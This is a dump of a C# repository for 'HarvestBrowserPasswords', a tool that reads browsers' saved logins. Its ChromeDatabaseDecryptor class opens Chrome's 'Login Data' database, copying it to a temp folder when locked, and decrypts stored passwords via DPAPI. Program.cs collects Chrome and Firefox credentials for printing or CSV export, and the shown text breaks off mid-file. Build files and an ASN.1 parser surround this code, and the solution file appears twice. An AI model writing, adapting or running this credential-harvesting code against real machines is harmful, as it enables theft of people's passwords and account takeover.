8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 23 | 25 | 26 | -------------------------------------------------------------------------------- /HarvestBrowserPAsswords.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29201.188 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HarvestBrowserPasswords", "HarvestBrowserPasswords.csproj", "{9F44BF2E-C4D8-443F-BDD7-86632E1AB226}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{143C933B-4711-4804-BEF2-7962E89C4A19}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Debug|x64 = Debug|x64 14 | Release|Any CPU = Release|Any CPU 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|x64.ActiveCfg = Debug|x64 21 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|x64.Build.0 = Debug|x64 22 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|Any CPU.Build.0 = Release|Any CPU 24 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|x64.ActiveCfg = Release|x64 25 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|x64.Build.0 = Release|x64 26 | EndGlobalSection 27 | GlobalSection(SolutionProperties) = preSolution 28 | HideSolutionNode = FALSE 29 | EndGlobalSection 30 | GlobalSection(ExtensibilityGlobals) = postSolution 31 | SolutionGuid = {8603105E-1DCC-4A42-8A37-664E9D17B277} 32 | EndGlobalSection 33 | EndGlobal 34 | -------------------------------------------------------------------------------- /HarvestBrowserPasswords.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29201.188 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HarvestBrowserPasswords", "HarvestBrowserPasswords.csproj", "{9F44BF2E-C4D8-443F-BDD7-86632E1AB226}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{143C933B-4711-4804-BEF2-7962E89C4A19}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Debug|x64 = Debug|x64 14 | Release|Any CPU = Release|Any CPU 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|x64.ActiveCfg = Debug|x64 21 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Debug|x64.Build.0 = Debug|x64 22 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|Any CPU.Build.0 = Release|Any CPU 24 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|x64.ActiveCfg = Release|x64 25 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226}.Release|x64.Build.0 = Release|x64 26 | EndGlobalSection 27 | GlobalSection(SolutionProperties) = preSolution 28 | HideSolutionNode = FALSE 29 | EndGlobalSection 30 | GlobalSection(ExtensibilityGlobals) = postSolution 31 | SolutionGuid = {8603105E-1DCC-4A42-8A37-664E9D17B277} 32 | EndGlobalSection 33 | EndGlobal 34 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /ChromeDatabaseDecryptor.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data.SQLite; 4 | using System.IO; 5 | using System.Security.Cryptography; 6 | using System.Text; 7 | 8 | namespace HarvestBrowserPasswords 9 | { 10 | public class ChromeDatabaseDecryptor 11 | { 12 | private string FilePath { get; set; } 13 | public List ChromeLoginDataList { get; set; } 14 | 15 | public ChromeDatabaseDecryptor(string databaseFilePath) 16 | { 17 | SQLiteConnection connection; 18 | 19 | //Attempt connection to the 'Login Data' database file and decrypt its contents 20 | try 21 | { 22 | connection = ChromeDatabaseConnection(databaseFilePath); 23 | ChromeDatabaseDecrypt(connection); 24 | connection.Dispose(); 25 | } 26 | //If unable to connect, copy the database to a temp directory and access the copied version of the db file 27 | catch (SQLiteException) 28 | { 29 | string tempDatabaseFilePath = Path.GetTempPath() + "Login Data"; 30 | 31 | Console.ForegroundColor = ConsoleColor.Red; 32 | Console.WriteLine($"[-] Unable to access database file. Copying it to temporary location at:\n\t{Path.GetTempPath()}"); 33 | Console.ResetColor(); 34 | 35 | File.Copy(databaseFilePath, tempDatabaseFilePath, true); 36 | 37 | connection = ChromeDatabaseConnection(tempDatabaseFilePath); 38 | ChromeDatabaseDecrypt(connection); 39 | 40 | //The program will maintain a handle to the temp database file despite database connection disposal. Garbage collection necessary to release the temp file for deletion 41 | GC.Collect(); 42 | GC.WaitForPendingFinalizers(); 43 | File.Delete(tempDatabaseFilePath); 44 | } 45 | } 46 | 47 | private SQLiteConnection ChromeDatabaseConnection(string databaseFilePath) 48 | { 49 | FilePath = databaseFilePath; 50 | SQLiteConnection sqliteConnection = new SQLiteConnection( 51 | $"Data Source={FilePath};" + 52 | $"Version=3;" + 53 | $"New=True"); 54 | 55 | ChromeLoginDataList = new List(); 56 | 57 | sqliteConnection.Open(); 58 | 59 | return sqliteConnection; 60 | } 61 | 62 | private void ChromeDatabaseDecrypt(SQLiteConnection sqliteConnection) 63 | { 64 | SQLiteCommand sqliteCommand = sqliteConnection.CreateCommand(); 65 | sqliteCommand.CommandText = "SELECT action_url, username_value, password_value FROM logins"; 66 | SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader(); 67 | 68 | //Iterate over each returned row from the query 69 | while (sqliteDataReader.Read()) 70 | { 71 | //Store columns as variables 72 | string formSubmitUrl = sqliteDataReader.GetString(0); 73 | 74 | //Avoid Printing empty rows 75 | if (string.IsNullOrEmpty(formSubmitUrl)) 76 | { 77 | continue; 78 | } 79 | 80 | string username = sqliteDataReader.GetString(1); 81 | byte[] password = (byte[])sqliteDataReader[2]; //Cast to byteArray for DPAPI decryption 82 | 83 | try 84 | { 85 | //DPAPI Decrypt - Requires System.Security.dll and System.Security.Cryptography 86 | byte[] decryptedBytes = ProtectedData.Unprotect(password, null, DataProtectionScope.CurrentUser); 87 | string decryptedPasswordString = Encoding.ASCII.GetString(decryptedBytes); 88 | 89 | BrowserLoginData loginData = new BrowserLoginData(formSubmitUrl, username, decryptedPasswordString, "Chrome"); 90 | ChromeLoginDataList.Add(loginData); 91 | } 92 | catch (Exception e) 93 | { 94 | Console.ForegroundColor = ConsoleColor.Red; 95 | Console.WriteLine($"[!] Error Decrypting Password: Exception {e}"); 96 | Console.ResetColor(); 97 | } 98 | } 99 | sqliteDataReader.Close(); 100 | sqliteConnection.Dispose(); 101 | } 102 | } 103 | } -------------------------------------------------------------------------------- /FodyWeavers.xsd: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 13 | 14 | 15 | 16 | 17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 18 | 19 | 20 | 21 | 22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 23 | 24 | 25 | 26 | 27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 28 | 29 | 30 | 31 | 32 | The order of preloaded assemblies, delimited with line breaks. 33 | 34 | 35 | 36 | 37 | 38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 39 | 40 | 41 | 42 | 43 | Controls if .pdbs for reference assemblies are also embedded. 44 | 45 | 46 | 47 | 48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 49 | 50 | 51 | 52 | 53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 54 | 55 | 56 | 57 | 58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 59 | 60 | 61 | 62 | 63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 64 | 65 | 66 | 67 | 68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 69 | 70 | 71 | 72 | 73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 74 | 75 | 76 | 77 | 78 | A list of unmanaged 32 bit assembly names to include, delimited with |. 79 | 80 | 81 | 82 | 83 | A list of unmanaged 64 bit assembly names to include, delimited with |. 84 | 85 | 86 | 87 | 88 | The order of preloaded assemblies, delimited with |. 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. 97 | 98 | 99 | 100 | 101 | A comma-separated list of error codes that can be safely ignored in assembly verification. 102 | 103 | 104 | 105 | 106 | 'false' to turn off automatic generation of the XML Schema file. 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /ASN1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | 4 | namespace HarvestBrowserPasswords 5 | { 6 | class ASN1 7 | { 8 | enum ASN1Types 9 | { 10 | SEQUENCE = 0x30, 11 | OCTETSTRING = 4, 12 | OBJECTIDENTIFIER = 6, 13 | INTEGER = 2, 14 | NULL = 5 15 | } 16 | public Sequence RootSequence { get; set; } 17 | public byte[] Asn1ByteArray { get; set; } 18 | bool finished = false; 19 | 20 | public ASN1(byte[] asn1Data) 21 | { 22 | Asn1ByteArray = asn1Data; 23 | RootSequence = new Sequence(); 24 | ParseTLV(RootSequence, 0); 25 | } 26 | 27 | public void ParseTLV(Sequence sequenceCurrent, int index) 28 | { 29 | //store the type value 30 | int i = index; 31 | int type = (int)Asn1ByteArray[i]; 32 | //and increment the index to the length field 33 | i += 1; 34 | 35 | //Check whether the length field is in short or long form then get length of the value 36 | int lengthForm = CheckLenthForm(Asn1ByteArray[i]); //Actually the number of octets used to represent the Length field 37 | int length = GetLength(i, lengthForm); 38 | 39 | //Increment the index to the value field 40 | i += lengthForm; 41 | 42 | //Check the type value and store each TLV's contents in the relevant sequence object` 43 | if (type == (int)ASN1Types.SEQUENCE) 44 | { 45 | //Create a temporary index value for the next recursive function call into this sequence 46 | int tempIndex = i; 47 | Sequence sequenceNew = new Sequence(); 48 | sequenceCurrent.Sequences.Add(sequenceNew); 49 | 50 | ParseTLV(sequenceNew, i); 51 | 52 | //Reset index to correct position after each recursion 53 | i += tempIndex + length; 54 | } 55 | else if (type == (int)ASN1Types.OBJECTIDENTIFIER) 56 | { 57 | byte[] tmpArray = new byte[length]; 58 | 59 | Buffer.BlockCopy(Asn1ByteArray, i, tmpArray, 0, length); 60 | 61 | sequenceCurrent.ObjectIdentifiers.Add(tmpArray); 62 | 63 | i += length; 64 | } 65 | else if (type == (int)ASN1Types.OCTETSTRING) 66 | { 67 | byte[] tmpArray = new byte[length]; 68 | 69 | Buffer.BlockCopy(Asn1ByteArray, i, tmpArray, 0, length); 70 | 71 | sequenceCurrent.OctetStrings.Add(tmpArray); 72 | 73 | i += length; 74 | } 75 | else if (type == (int)ASN1Types.INTEGER) 76 | { 77 | byte[] tmpArray = new byte[length]; 78 | 79 | Buffer.BlockCopy(Asn1ByteArray, i, tmpArray, 0, length); 80 | 81 | sequenceCurrent.Integers.Add(tmpArray); 82 | 83 | i += 1; 84 | } 85 | else if (type == (int)ASN1Types.NULL) 86 | { 87 | //'Contents' octets are empty. 88 | //If BER encoded and length octets are in long form, increment 1 additional byte to next TLV. If DER encoded, index is already at next TLV 89 | if (lengthForm > 1) 90 | { 91 | i += 1; 92 | } 93 | } 94 | else 95 | { 96 | //Some other type not accounted for in the ASN1Types enum 97 | i += length; 98 | } 99 | 100 | //Checked every type, meaning there was more than one element in this sequence. Move to next element 101 | //But first, check that we haven't hit the end of the ASN encoded data 102 | if (i < Asn1ByteArray.Length && finished == false) 103 | { 104 | ParseTLV(sequenceCurrent, i); 105 | } 106 | else 107 | { 108 | finished = true; 109 | } 110 | } 111 | 112 | public int CheckLenthForm(byte length) 113 | { 114 | if ((length & 0x80) > 0) //Bit 8 of first octet has value 1 and bits 7-1 give number of additional length octets 115 | { 116 | //Long Form 117 | //Get number of additional length octets 118 | return (int)(length & 0x7f); 119 | } 120 | else 121 | { 122 | //Return 1 to indicate that the length field is stored in short form 123 | //Incrementing the index by the length form value will set the index to the start of the value field 124 | return 1; 125 | } 126 | } 127 | public int GetLength(int index, int lFormLength) 128 | { 129 | byte length = Asn1ByteArray[index]; 130 | int longFormLength = lFormLength - 1; 131 | 132 | /* 133 | http://luca[.]ntop.org/Teaching/Appunti/asn1.html Chapter 3.1 describtes length octets of TL 134 | Check if length value is in long or short format 135 | */ 136 | if (longFormLength > 1) //Set to 1 if length value is in short form 137 | { 138 | 139 | //Create new bytearray to store long form length value 140 | byte[] longFormBytes = new byte[longFormLength]; 141 | 142 | //Copy length bytes from full byte array for conversion 143 | for (int i = 0; i < longFormLength + 1; i++) 144 | { 145 | longFormBytes[i] = Asn1ByteArray[index + i]; 146 | } 147 | 148 | try 149 | { 150 | return BitConverter.ToInt32(longFormBytes, 0); 151 | } 152 | catch (Exception e) 153 | { 154 | Console.BackgroundColor = ConsoleColor.Red; 155 | Console.WriteLine($"Exception: {e}"); 156 | Console.ResetColor(); 157 | return (int)length; 158 | } 159 | } 160 | else 161 | { 162 | //Short Form 163 | return (int)length; 164 | } 165 | } 166 | 167 | public class Sequence 168 | { 169 | public List Sequences { get; set; } 170 | public List Integers { get; set; } 171 | public List OctetStrings { get; set; } 172 | public List ObjectIdentifiers { get; set; } 173 | 174 | public Sequence() 175 | { 176 | Sequences = new List(); 177 | Integers = new List(); 178 | OctetStrings = new List(); 179 | ObjectIdentifiers = new List(); 180 | } 181 | } 182 | } 183 | } 184 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Build results 17 | [Dd]ebug/ 18 | [Dd]ebugPublic/ 19 | [Rr]elease/ 20 | [Rr]eleases/ 21 | x64/ 22 | x86/ 23 | [Aa][Rr][Mm]/ 24 | [Aa][Rr][Mm]64/ 25 | bld/ 26 | [Bb]in/ 27 | [Oo]bj/ 28 | [Ll]og/ 29 | 30 | # Visual Studio 2015/2017 cache/options directory 31 | .vs/ 32 | # Uncomment if you have tasks that create the project's static files in wwwroot 33 | #wwwroot/ 34 | 35 | # Visual Studio 2017 auto generated files 36 | Generated\ Files/ 37 | 38 | # MSTest test Results 39 | [Tt]est[Rr]esult*/ 40 | [Bb]uild[Ll]og.* 41 | 42 | # NUNIT 43 | *.VisualState.xml 44 | TestResult.xml 45 | 46 | # Build Results of an ATL Project 47 | [Dd]ebugPS/ 48 | [Rr]eleasePS/ 49 | dlldata.c 50 | 51 | # Benchmark Results 52 | BenchmarkDotNet.Artifacts/ 53 | 54 | # .NET Core 55 | project.lock.json 56 | project.fragment.lock.json 57 | artifacts/ 58 | 59 | # StyleCop 60 | StyleCopReport.xml 61 | 62 | # Files built by Visual Studio 63 | *_i.c 64 | *_p.c 65 | *_h.h 66 | *.ilk 67 | *.meta 68 | *.obj 69 | *.iobj 70 | *.pch 71 | *.pdb 72 | *.ipdb 73 | *.pgc 74 | *.pgd 75 | *.rsp 76 | *.sbr 77 | *.tlb 78 | *.tli 79 | *.tlh 80 | *.tmp 81 | *.tmp_proj 82 | *_wpftmp.csproj 83 | *.log 84 | *.vspscc 85 | *.vssscc 86 | .builds 87 | *.pidb 88 | *.svclog 89 | *.scc 90 | 91 | # Chutzpah Test files 92 | _Chutzpah* 93 | 94 | # Visual C++ cache files 95 | ipch/ 96 | *.aps 97 | *.ncb 98 | *.opendb 99 | *.opensdf 100 | *.sdf 101 | *.cachefile 102 | *.VC.db 103 | *.VC.VC.opendb 104 | 105 | # Visual Studio profiler 106 | *.psess 107 | *.vsp 108 | *.vspx 109 | *.sap 110 | 111 | # Visual Studio Trace Files 112 | *.e2e 113 | 114 | # TFS 2012 Local Workspace 115 | $tf/ 116 | 117 | # Guidance Automation Toolkit 118 | *.gpState 119 | 120 | # ReSharper is a .NET coding add-in 121 | _ReSharper*/ 122 | *.[Rr]e[Ss]harper 123 | *.DotSettings.user 124 | 125 | # JustCode is a .NET coding add-in 126 | .JustCode 127 | 128 | # TeamCity is a build add-in 129 | _TeamCity* 130 | 131 | # DotCover is a Code Coverage Tool 132 | *.dotCover 133 | 134 | # AxoCover is a Code Coverage Tool 135 | .axoCover/* 136 | !.axoCover/settings.json 137 | 138 | # Visual Studio code coverage results 139 | *.coverage 140 | *.coveragexml 141 | 142 | # NCrunch 143 | _NCrunch_* 144 | .*crunch*.local.xml 145 | nCrunchTemp_* 146 | 147 | # MightyMoose 148 | *.mm.* 149 | AutoTest.Net/ 150 | 151 | # Web workbench (sass) 152 | .sass-cache/ 153 | 154 | # Installshield output folder 155 | [Ee]xpress/ 156 | 157 | # DocProject is a documentation generator add-in 158 | DocProject/buildhelp/ 159 | DocProject/Help/*.HxT 160 | DocProject/Help/*.HxC 161 | DocProject/Help/*.hhc 162 | DocProject/Help/*.hhk 163 | DocProject/Help/*.hhp 164 | DocProject/Help/Html2 165 | DocProject/Help/html 166 | 167 | # Click-Once directory 168 | publish/ 169 | 170 | # Publish Web Output 171 | *.[Pp]ublish.xml 172 | *.azurePubxml 173 | # Note: Comment the next line if you want to checkin your web deploy settings, 174 | # but database connection strings (with potential passwords) will be unencrypted 175 | *.pubxml 176 | *.publishproj 177 | 178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 179 | # checkin your Azure Web App publish settings, but sensitive information contained 180 | # in these scripts will be unencrypted 181 | PublishScripts/ 182 | 183 | # NuGet Packages 184 | *.nupkg 185 | # The packages folder can be ignored because of Package Restore 186 | **/[Pp]ackages/* 187 | # except build/, which is used as an MSBuild target. 188 | !**/[Pp]ackages/build/ 189 | # Uncomment if necessary however generally it will be regenerated when needed 190 | #!**/[Pp]ackages/repositories.config 191 | # NuGet v3's project.json files produces more ignorable files 192 | *.nuget.props 193 | *.nuget.targets 194 | 195 | # Microsoft Azure Build Output 196 | csx/ 197 | *.build.csdef 198 | 199 | # Microsoft Azure Emulator 200 | ecf/ 201 | rcf/ 202 | 203 | # Windows Store app package directories and files 204 | AppPackages/ 205 | BundleArtifacts/ 206 | Package.StoreAssociation.xml 207 | _pkginfo.txt 208 | *.appx 209 | 210 | # Visual Studio cache files 211 | # files ending in .cache can be ignored 212 | *.[Cc]ache 213 | # but keep track of directories ending in .cache 214 | !?*.[Cc]ache/ 215 | 216 | # Others 217 | ClientBin/ 218 | ~$* 219 | *~ 220 | *.dbmdl 221 | *.dbproj.schemaview 222 | *.jfm 223 | *.pfx 224 | *.publishsettings 225 | orleans.codegen.cs 226 | 227 | # Including strong name files can present a security risk 228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 229 | #*.snk 230 | 231 | # Since there are multiple workflows, uncomment next line to ignore bower_components 232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 233 | #bower_components/ 234 | 235 | # RIA/Silverlight projects 236 | Generated_Code/ 237 | 238 | # Backup & report files from converting an old project file 239 | # to a newer Visual Studio version. Backup files are not needed, 240 | # because we have git ;-) 241 | _UpgradeReport_Files/ 242 | Backup*/ 243 | UpgradeLog*.XML 244 | UpgradeLog*.htm 245 | ServiceFabricBackup/ 246 | *.rptproj.bak 247 | 248 | # SQL Server files 249 | *.mdf 250 | *.ldf 251 | *.ndf 252 | 253 | # Business Intelligence projects 254 | *.rdl.data 255 | *.bim.layout 256 | *.bim_*.settings 257 | *.rptproj.rsuser 258 | *- Backup*.rdl 259 | 260 | # Microsoft Fakes 261 | FakesAssemblies/ 262 | 263 | # GhostDoc plugin setting file 264 | *.GhostDoc.xml 265 | 266 | # Node.js Tools for Visual Studio 267 | .ntvs_analysis.dat 268 | node_modules/ 269 | 270 | # Visual Studio 6 build log 271 | *.plg 272 | 273 | # Visual Studio 6 workspace options file 274 | *.opt 275 | 276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 277 | *.vbw 278 | 279 | # Visual Studio LightSwitch build output 280 | **/*.HTMLClient/GeneratedArtifacts 281 | **/*.DesktopClient/GeneratedArtifacts 282 | **/*.DesktopClient/ModelManifest.xml 283 | **/*.Server/GeneratedArtifacts 284 | **/*.Server/ModelManifest.xml 285 | _Pvt_Extensions 286 | 287 | # Paket dependency manager 288 | .paket/paket.exe 289 | paket-files/ 290 | 291 | # FAKE - F# Make 292 | .fake/ 293 | 294 | # JetBrains Rider 295 | .idea/ 296 | *.sln.iml 297 | 298 | # CodeRush personal settings 299 | .cr/personal 300 | 301 | # Python Tools for Visual Studio (PTVS) 302 | __pycache__/ 303 | *.pyc 304 | 305 | # Cake - Uncomment if you are using it 306 | # tools/** 307 | # !tools/packages.config 308 | 309 | # Tabs Studio 310 | *.tss 311 | 312 | # Telerik's JustMock configuration file 313 | *.jmconfig 314 | 315 | # BizTalk build output 316 | *.btp.cs 317 | *.btm.cs 318 | *.odx.cs 319 | *.xsd.cs 320 | 321 | # OpenCover UI analysis results 322 | OpenCover/ 323 | 324 | # Azure Stream Analytics local run output 325 | ASALocalRun/ 326 | 327 | # MSBuild Binary and Structured Log 328 | *.binlog 329 | 330 | # NVidia Nsight GPU debugger configuration file 331 | *.nvuser 332 | 333 | # MFractors (Xamarin productivity tool) working folder 334 | .mfractor/ 335 | 336 | # Local History for Visual Studio 337 | .localhistory/ 338 | 339 | # BeatPulse healthcheck temp database 340 | healthchecksdb -------------------------------------------------------------------------------- /HarvestBrowserPasswords.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | Debug 8 | AnyCPU 9 | {9F44BF2E-C4D8-443F-BDD7-86632E1AB226} 10 | Exe 11 | HarvestBrowserPasswords 12 | HarvestBrowserPasswords 13 | v4.0 14 | 512 15 | true 16 | 17 | 18 | 19 | 20 | 21 | AnyCPU 22 | true 23 | full 24 | false 25 | bin\Debug\ 26 | DEBUG;TRACE 27 | prompt 28 | 3 29 | 30 | 31 | AnyCPU 32 | pdbonly 33 | true 34 | bin\Release\ 35 | TRACE 36 | prompt 37 | 4 38 | 39 | 40 | true 41 | bin\x64\Debug\ 42 | DEBUG;TRACE 43 | 3 44 | full 45 | x64 46 | prompt 47 | MinimumRecommendedRules.ruleset 48 | 49 | 50 | bin\x64\Release\ 51 | TRACE 52 | true 53 | pdbonly 54 | x64 55 | prompt 56 | MinimumRecommendedRules.ruleset 57 | 58 | 59 | 60 | packages\CommandLineParser.2.6.0\lib\net40\CommandLine.dll 61 | 62 | 63 | packages\Costura.Fody.4.1.0\lib\net40\Costura.dll 64 | 65 | 66 | packages\EntityFramework.6.4.0\lib\net40\EntityFramework.dll 67 | 68 | 69 | packages\EntityFramework.6.4.0\lib\net40\EntityFramework.SqlServer.dll 70 | 71 | 72 | 73 | packages\Newtonsoft.Json.12.0.3\lib\net40\Newtonsoft.Json.dll 74 | 75 | 76 | 77 | 78 | 79 | packages\System.Data.SQLite.Core.1.0.112.0\lib\net40\System.Data.SQLite.dll 80 | 81 | 82 | packages\System.Data.SQLite.EF6.1.0.112.0\lib\net40\System.Data.SQLite.EF6.dll 83 | 84 | 85 | packages\System.Data.SQLite.Linq.1.0.112.0\lib\net40\System.Data.SQLite.Linq.dll 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /Program.cs: -------------------------------------------------------------------------------- 1 | using CommandLine; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Linq; 6 | using System.Security.Principal; 7 | 8 | namespace HarvestBrowserPasswords 9 | { 10 | class Program 11 | { 12 | static void Main(string[] args) 13 | { 14 | Console.ForegroundColor = ConsoleColor.Cyan; 15 | Console.WriteLine("HarvestBrowserPasswords.exe v1.0"); 16 | Console.ResetColor(); 17 | 18 | //Get username of current user account 19 | string userAccountName = GetCurrentUser(); 20 | 21 | Options opts = new Options(); 22 | 23 | var parser = new Parser(with => with.HelpWriter = null); 24 | 25 | //Parse command line arguments 26 | var result = parser.ParseArguments(args) 27 | .WithParsed(parsed => opts = parsed); 28 | 29 | parser.Dispose(); 30 | 31 | List loginDataList = new List(); 32 | try 33 | { 34 | //Check command line arguments 35 | if (opts.All) 36 | { 37 | loginDataList = (loginDataList.Concat(GetChromePasswords(userAccountName))).ToList(); 38 | loginDataList = (loginDataList.Concat(GetFirefoxPasswords(userAccountName, opts.Password))).ToList(); 39 | } 40 | else if (opts.Chrome) 41 | { 42 | loginDataList = (loginDataList.Concat(GetChromePasswords(userAccountName))).ToList(); 43 | } 44 | else if (opts.Firefox) 45 | { 46 | loginDataList = (loginDataList.Concat(GetFirefoxPasswords(userAccountName, opts.Password))).ToList(); 47 | } 48 | else if (opts.Help) 49 | { 50 | PrintHelpToConsole(); 51 | } 52 | //Check for case where no arguments were entered 53 | else if (opts.CheckIfNoArgs()) 54 | { 55 | PrintHelpToConsole(); 56 | } 57 | } 58 | catch (Exception e) 59 | { 60 | Console.ForegroundColor = ConsoleColor.Red; 61 | 62 | if (e.InnerException != null) 63 | { 64 | 65 | Console.WriteLine($"[-] {e.InnerException.Message}"); 66 | } 67 | else 68 | { 69 | Console.WriteLine($"[-] {e.Message}"); 70 | } 71 | Console.ResetColor(); 72 | } 73 | 74 | //Output all decrypted logins 75 | if(loginDataList.Count > 0) 76 | { 77 | if (string.IsNullOrEmpty(opts.Outfile)) 78 | { 79 | Console.ForegroundColor = ConsoleColor.Yellow; 80 | PrintLoginsToConsole(loginDataList); 81 | } 82 | else 83 | { 84 | WriteToCSV(loginDataList, opts.Outfile); 85 | } 86 | } 87 | 88 | } 89 | 90 | //Check if currently running in administrator context 91 | public static 